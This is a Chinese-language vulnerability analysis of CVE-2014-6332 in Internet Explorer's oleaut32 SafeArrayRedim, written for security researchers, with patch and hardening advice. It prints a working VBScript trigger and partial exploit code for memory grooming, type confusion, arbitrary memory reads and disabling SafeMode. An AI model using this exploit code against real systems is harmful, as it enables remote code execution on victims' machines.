Internet Explorer漏洞分析：CVE-2014-6332技术文档

0x01 漏洞概述

漏洞基本信息

• CVE编号：CVE-2014-6332
• 漏洞类型：远程代码执行(RCE)
• CVSS 2.0评分：9.3（高危）
• 影响组件：oleaut32.dll中的SafeArrayRedim函数

受影响系统

• Windows Server 2003 SP2
• Windows Vista SP2
• Windows Server 2008 SP2和R2 SP1
• Windows 7 SP1
• Windows 8
• Windows 8.1
• Windows Server 2012 Gold和R2
• Windows RT Gold和8.1

漏洞原理

oleaut32.dll中SafeArrayRedim函数在进行数组重新定义时未对传入参数psaboundNew进行有效校验，导致可以越界读写内存，进而实现任意代码执行。

0x02 技术分析

分析环境

• 操作系统：Windows 7 Service Pack 1
• IE版本：8.0.7601.17514
• 关键DLL版本：
  • oleaut32.dll：6.1.7601.17514
  • vbscript.dll：5.8.7601.17514

前置知识

• VBScript数组操作机制
• SafeArray数据结构
• IE内存管理机制

漏洞详细分析

漏洞触发POC

<!doctype html>
<html lang="en">
<head>
</head>
<body>
<script LANGUAGE="VBScript">
    On Error Resume Next
    Dim arrayA()
    Dim size
    Dim over
    size = &h5
    over = &h8000000 + size
    Redim Preserve arrayA(size)
    Redim Preserve arrayA(over)
    arrayA(size+1) = "Hello"
</script>
</body>
</html>

关键函数调用流程

1. vbscript!RedimPreserveArray 调用 oleaut32.dll!SafeArrayRedim
2. SafeArrayRedim执行流程：
   • 检查参数psa与psaboundNew不为空
   • 检查psa.fFeatures、psa.cDims及psa.cLocks
   • 调用SafeArraySize计算数组元素占用空间大小
   • 将psaboundNew写入psa.rgsabound
   • 计算调整后数组大小与原数组大小的差值

漏洞触发点

当传入的数组大小参数为0x8000000 + size时：

1. test ebx, ebx与jge组合进行有符号数比较
2. neg对其取反仍为0x80000000
3. 导致内存分配异常，实现任意地址读写

漏洞利用分析

利用步骤概述

1. 通过循环不断重新定义数组，扩大数组规模
2. 使两个数组在内存中相邻（相差8字节）
3. 通过类型混淆实现数组越界访问
4. 构造特殊数据实现任意内存读写
5. 修改安全标志位关闭SafeMode
6. 执行任意代码

关键利用代码解析

第一部分：内存布局准备

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)     
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
       Create=True
       Exit For
    End If 
  Next
end function

第二部分：类型混淆利用

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)  
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314
     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310  
     mydata=aa(a1)
     redim  Preserve aa(a0)  
end function

第三部分：内存读取功能

function ReadMemo(add) 
    On Error Resume Next
    redim  Preserve aa(a2)  
    ab(0)=0   
    aa(a1)=add+4     
    ab(0)=1.69759663316747E-313       
    ReadMemo=lenb(aa(a1))  
    ab(0)=0    
    redim  Preserve aa(a0)
end function

第四部分：关闭SafeMode

function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)  
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0          
              redim  Preserve aa(a2)             
              aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)  
              j=0 
              j=readmemo(i+&h120+k)   
              Exit for
        end if
    next 
    ab(2)=1.69759663316747E-313
    runmumaa() 
end function

0x03 修复方案

微软已发布安全补丁MS14-064修复此漏洞，建议所有受影响系统及时安装更新。

0x04 防护建议

1. 及时安装微软安全更新MS14-064
2. 禁用IE中的VBScript支持
3. 使用增强的防护机制(如EMET)
4. 部署应用白名单策略限制未知脚本执行

0x05 参考链接

1. Microsoft Docs - SAFEARRAY结构
2. MS14-064安全公告
3. CVE-2014-6332漏洞详情

文档说明：本技术文档详细分析了CVE-2014-6332漏洞的技术原理、利用方式及防护方案，适用于安全研究人员进行漏洞分析和防护措施制定。实际利用此漏洞可能涉及法律问题，请确保在合法授权范围内进行研究。